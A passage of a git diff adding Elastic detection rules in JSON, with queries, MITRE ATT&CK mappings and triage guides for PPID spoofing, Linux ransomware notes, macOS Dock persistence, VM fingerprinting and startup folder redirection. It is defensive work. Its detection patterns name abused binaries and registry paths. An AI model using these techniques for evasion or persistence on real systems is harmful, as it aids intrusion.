Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_106.json b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_106.json new file mode 100644 index 00000000000..3c3157bcbea --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_106.json @@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary can establish persistence by modifying an existing macOS dock property list in order to execute a malicious application instead of the intended one when invoked.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Persistence via Docker Shortcut Modification", + "query": "event.category:file and host.os.type:macos and event.action:modification and\n file.path:/Users/*/Library/Preferences/com.apple.dock.plist and\n not process.name:(xpcproxy or cfprefsd or plutil or jamf or PlistBuddy or InstallerRemotePluginService)\n", + "references": [ + "https://github.com/specterops/presentations/raw/master/Leo%20Pitt/Hey_Im_Still_in_Here_Modern_macOS_Persistence_SO-CON2020.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c81cefcb-82b9-4408-a533-3c3df549e62d", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "c81cefcb-82b9-4408-a533-3c3df549e62d_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_105.json b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_105.json new file mode 100644 index 00000000000..d33c84eb556 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_105.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary may attempt to get detailed information about the operating system and hardware. This rule identifies common locations used to discover virtual machine hardware by a non-root user. This technique has been used by the Pupy RAT and other malware.", + "false_positives": [ + "Certain tools or automated software may enumerate hardware information. These tools can be exempted via user name or process arguments to eliminate potential noise." + ], + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Virtual Machine Fingerprinting via Grep", + "query": "process where event.type == \"start\" and\n process.name in (\"grep\", \"egrep\") and user.id != \"0\" and\n process.args : (\"parallels*\", \"vmware*\", \"virtualbox*\") and process.args : \"Manufacturer*\" and\n not process.parent.executable in (\"/Applications/Docker.app/Contents/MacOS/Docker\", \"/usr/libexec/kcare/virt-what\")\n", + "references": [ + "https://objective-see.com/blog/blog_0x4F.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c85eb82c-d2c8-485c-a36f-534f914b7663", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 105 + }, + "id": "c85eb82c-d2c8-485c-a36f-534f914b7663_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_106.json b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_106.json new file mode 100644 index 00000000000..1b5a2af4f7d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_106.json @@ -0,0 +1,153 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies parent process spoofing used to thwart detection. Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Parent Process PID Spoofing", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nsequence by host.id, user.id with maxspan=3m \n\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name != \"system\" and \n (\n process.pe.original_file_name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"msbuild.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") or \n \n (process.executable : (\"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*.exe\",\n \"?:\\\\Windows\\\\Tasks\\\\*\") and \n (process.code_signature.exists == false or process.code_signature.status : \"errorBadDigest\")) or \n \n process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*.exe\" \n ) and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.pid\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.Ext.real.pid > 0 and \n \n /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */\n not (process.name : \"msedge.exe\" and process.parent.name : \"sihost.exe\") and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.parent.Ext.real.pid\n", + "references": [ + "https://blog.didierstevens.com/2017/03/20/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.parent.Ext.real.pid", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c88d4bd0-5649-4c52-87ea-9be59dbfbcf2", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.004", + "name": "Parent PID Spoofing", + "reference": "https://attack.mitre.org/techniques/T1134/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.004", + "name": "Parent PID Spoofing", + "reference": "https://attack.mitre.org/techniques/T1134/004/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_8.json b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_8.json new file mode 100644 index 00000000000..ade28495fa8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_8.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies a sequence of a mass file encryption event in conjunction with the creation of a .txt file with a file name containing ransomware keywords executed by the same process in a 1 second timespan. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Ransomware Note Creation Detected", + "query": "sequence by process.entity_id, host.id with maxspan=1s \n [file where host.os.type == \"linux\" and event.type == \"change\" and event.action == \"rename\" and file.extension : \"?*\" \n and process.executable : (\"./*\", \"/tmp/*\", \"/var/tmp/*\", \"/dev/shm/*\", \"/var/run/*\", \"/boot/*\", \"/srv/*\", \"/run/*\") and\n file.path : (\n \"/home/*/Downloads/*\", \"/home/*/Documents/*\", \"/root/*\", \"/bin/*\", \"/usr/bin/*\", \"/var/log/*\", \"/var/lib/log/*\",\n \"/var/backup/*\", \"/var/www/*\") and\n not process.name : (\n \"dpkg\", \"yum\", \"dnf\", \"rpm\", \"dockerd\", \"go\", \"java\", \"pip*\", \"python*\", \"node\", \"containerd\", \"php\", \"p4d\",\n \"conda\", \"chrome\", \"imap\", \"cmake\", \"firefox\", \"semanage\", \"semodule\", \"ansible-galaxy\", \"fc-cache\", \"jammy\", \"git\",\n \"systemsettings\", \"vmis-launcher\", \"bundle\", \"kudu-tserver\", \"suldownloader\"\n )\n ] with runs=25\n [file where host.os.type == \"linux\" and event.action == \"creation\" and file.name : (\n \"*crypt*\", \"*restore*\", \"*lock*\", \"*recovery*\", \"*data*\", \"*read*\", \"*instruction*\", \"*how_to*\", \"*ransom*\"\n )\n ]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c8935a8b-634a-4449-98f7-bb24d3b2c0af", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Impact", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1486", + "name": "Data Encrypted for Impact", + "reference": "https://attack.mitre.org/techniques/T1486/" + } + ] + } + ], + "type": "eql", + "version": 8 + }, + "id": "c8935a8b-634a-4449-98f7-bb24d3b2c0af_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_109.json b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_109.json new file mode 100644 index 00000000000..7036e4e2d5a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_109.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious startup shell folder modifications to change the default Startup directory in order to bypass detections monitoring file creation in the Windows Startup folder.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Startup Shell Folder Modification", + "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\"\n ) and\n registry.data.strings != null and\n /* Normal Startup Folder Paths */\n not registry.data.strings : (\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%ProgramData%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c8b150f0-0164-475b-a75e-74b47800a9ff", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "c8b150f0-0164-475b-a75e-74b47800a9ff_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_110.json b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_110.json new file mode 100644 index 00000000000..f3fd82e63b1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_110.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious startup shell folder modifications to change the default Startup directory in order to bypass detections monitoring file creation in the Windows Startup folder.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Startup Shell Folder Modification", + "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to 